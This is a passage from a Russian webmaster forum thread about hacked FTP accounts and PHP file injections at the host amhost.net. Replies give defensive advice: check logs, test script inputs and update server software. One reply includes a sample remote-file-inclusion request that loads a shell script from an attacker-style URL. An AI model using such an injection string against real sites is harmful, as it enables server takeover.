amhost.net - хакают ФТП - Форум успешных вебмастеров - GoFuckBiz.com - Страница 5
 
 
Форум успешных вебмастеров - GoFuckBiz.com

  Форум успешных вебмастеров - GoFuckBiz.com > Бизнес-решения > Хостинг и железо
Дата
USD/RUB88.6852
BTC/USD68362.1245
Хостинг и железо Обсуждаем вопросы хостинга и железа.

Закрытая тема
Опции темы Опции просмотра
Старый 18.03.2012, 19:35
Start Post: amhost.net - хакают ФТП 
  #41
Hector
hustle
 
Аватар для Hector
 
Регистрация: 02.05.2008
Адрес: 3d world
Сообщений: 12,890
Бабло: $1717315
Отправить сообщение для Hector с помощью Jabber
По умолчанию

Кто юзает сабж? У меня с завидной регулярностью кто-то там прописывает срань в php файлах. Вот думаю это или хостинг гавно или что-то другое.
Hector вне форума  
Старый 28.03.2012, 15:51   #42
Alexsize
All is Dust
 
Регистрация: 18.12.2008
Сообщений: 314
Бабло: $61480
По умолчанию

ТС ip хостинга случайно не *.*.229.91 ?

Сегодня амхост меня в рассылке обвинил, закрыли акк.

Кто то майлером с моего ftp шалил.

То что пароли ушли не у меня я уверен xD

Амхост уверен наоборот )

Впрочем все оперативно порешали, сейчас меняю пароли и надеюсь что такого больше не повториться, блоги жалко.

Последний раз редактировалось Alexsize; 28.03.2012 в 16:03.
Alexsize вне форума  
Старый 28.03.2012, 16:12   #43
KongWeiLing
Senior Member
 
Аватар для KongWeiLing
 
Регистрация: 28.03.2011
Сообщений: 419
Бабло: $81005
По умолчанию

ТС а ты вообще уверен в своих скриптах? может твоя самопальная тдска дырява? и раз проста как пять копеек то в ней вообще может быть инклюд типа tds.php?open=http://coolhazker.narod.ru/shell.txt?
а то вообще по твоим словам создается впечатление, что в безопасности ты не очень разбираешься. Кстати, если оунер скриптов тотже юзер от которого они запускаются то 644 права нифига не ограничат от записи.

я бы провел бы следующие действия:
1) лог обращений к серверу прошерстил бы на предмет кавычек и характерных пхп функций. а также если у тебя одни редиректы то вообще на открытие страниц с нередиректным кодом (200)
2) лог фтп, если есть, на предмет не твоих айпишек
3) все параметры принимаемые твоими скриптами минимум почекал бы на прием кавычек, знаков конца строки, и если они выдают ошибки то задумайся о скриптах.(это можно и не разбираясь в пхп и безопасности сделать)
4)если дедик и софт на серваке ставил сам, проверь может по старое и дырявое.
KongWeiLing вне форума